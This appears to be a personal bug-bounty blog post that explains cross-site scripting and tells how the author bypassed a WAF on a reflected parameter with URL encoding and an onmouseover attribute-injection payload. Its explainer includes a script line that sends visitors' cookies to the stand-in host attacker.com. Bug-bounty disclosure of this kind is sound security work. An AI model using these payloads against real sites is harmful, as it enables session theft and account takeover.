Nov 24, 2021
STORY OF AN ENCODED XSS
Hi everyone, I hope you all are doing well and great! In this article we are going to talk about a weird xss that i found in one of the most famous energy drinks company(you might have guessed it 😉)
Contents of this article:
1- What is XSS?
2- Story of Weird XSS.
So let’s begin our hacking journey.
#1.WHAT IS XSS?
Have you ever heard the term “Javascript”? If yes then good but if not then it is nothing but a programming language most commonly used at client side(Browsers like Firefox, Chrome etc). You all must have visited websites that have very fancy looks, animation, etc. Well, these things are possible because of javascript. It can control the whole webpage and manipulate it as per the developer’s choice!
It is very good for developers since they can add more design, functionalities etc with ease via Javascript. But ask yourself, what do you think will happen if someone else(attacker) will be able to write their own javascript code into other’s website?
You might have guessed it 😉
Then that particular user can manipulate someone’s website without authorization and can change anything or do any thing on the webpage.
Well, this is how cross site scripting works.
In general terms, CROSS SITE SCRIPTING(XSS) is a web app vulnerability that allows attacker to inject their own malicious code into the web application.
Now by achieving xss, the attacker can:
1- Change the content of the page.
2- Steal cookies.
3- Redirect Users.
4- Deliver Malwares
and so on…
Let’s see one example:
#Example:
Suppose Facebook’s comment functionality is vulnerable to xss. Now the attacker visited some famous personality’s page(let’s say Ronaldo) and in his latest post, he commented:
<script>document.location.href=”https://attacker.com/?cookie=” + document.cookie</script>
Now this code will send every person’s cookies who visited Ronaldo’s post to the attacker. And by using that cookies, the attacker can now have full control over the victims account.
In this case, everyone who sees Ronaldo’s latest post will become a victim of the attacker and will lose their account to the attacker. And since Ronaldo is a very famous personality, the attacker can hack at least 10 MILLION users by just using the script above!!!!!!!!
Now i hope that you understood about what is xss and why it is one of the most dangerous vulnerability out there.
To learn more about xss, you can visit this website:
Let’s jump to our story 😄
#2. Story of the weird X S S
In the month of September, i started hunting on a private bug bounty program that has everything is in scope. So i began my recon process and started looking for some common vulnerabilities like Open Redirection, CSRF, etc. In 2–3 days i founded 9 vulnerabilities in the Company and reported all of them. But unfortunately all of them was flagged either as Duplicate or Not Applicable.
On the next day, I started testing a new web application which was running on ASP server. I tried to find some hidden parameters using some tools like FFUF and Paramspider and found a menuid parameter. I captured the request in the burpsuite and tried injecting a normal <script>alert(1)</script> tag but it was protected and it redirected me to NotFound.aspx page. I was about to give up but then i thought of only add <> in parameter’s value but the result was still the same😑
Then i thought let’s URL Encode the special characters and see what happens after. I encoded < to %3c and > to %3e and to my surprise it got rendered!!
Then i tried to inject <script>alert(1)</script> but it didn’t work. It seems like the back end was checking some of the harmful tags to prevent xss. After sometime, i found that when i add “/” in the payload, it triggers the WAF and redirects me to the NotFound page.
On digging deeper, I found that the payload was reflecting in the div tag. Something like this:
<div menuid=”reflected_data”></div>
Then i tried to check what values are reflected on the page and i found:
“” → Reflected
<> → Reflected
/ → Blocked
<anything between tags> → Blocked
<anything → Reflected
>anything → Reflected
By analyzing the web page behavior, I concluded that we cannot use any tags since it will block us right away. So our only target is javascript events like onmouseover, onclick etc
So i crafted the payload below using the above information:
batman“ onmouseover=alert(1)>
so if i pass this value in the parameter it will close the string and allowing me to add a event like this:
<div menuid=”batman” onmouseover=alert(1)> ”> </div>
And BOOM! It was reflected and i got the SCARY ALERT 1 POP UP! 😁😁
I reported this issue to the company right away and in gratitude, they rewarded my with 1 tray of their energy drinks !!
I was like
Takeaways:
1- Never give up.
2- Analyze the web response and attack according to it.
3- Follow the road less traveled.
4- Never stop learning.
5- Try to add special characters and see the response.
That’s it for this article. I hope that you learnt something new from it. Let me know if you guys have any doubts regarding this article or XSS 😄
We’ll meet again in next article. Till then
LinkedIn Account: https://www.linkedin.com/in/faiyaz-ahmad-64457520b/
Twitter Account: https://twitter.com/FaIyaZz007
UPDATE: If anyone who is interested in hacking windows with just python then they can enroll the course below for free! Just use “FEBHACK” in the coupon.
Course Link: https://www.udemy.com/course/hacking-windows-with-python-from-scratch-2022/?referralCode=1647ED5816EFD5D2F2EB
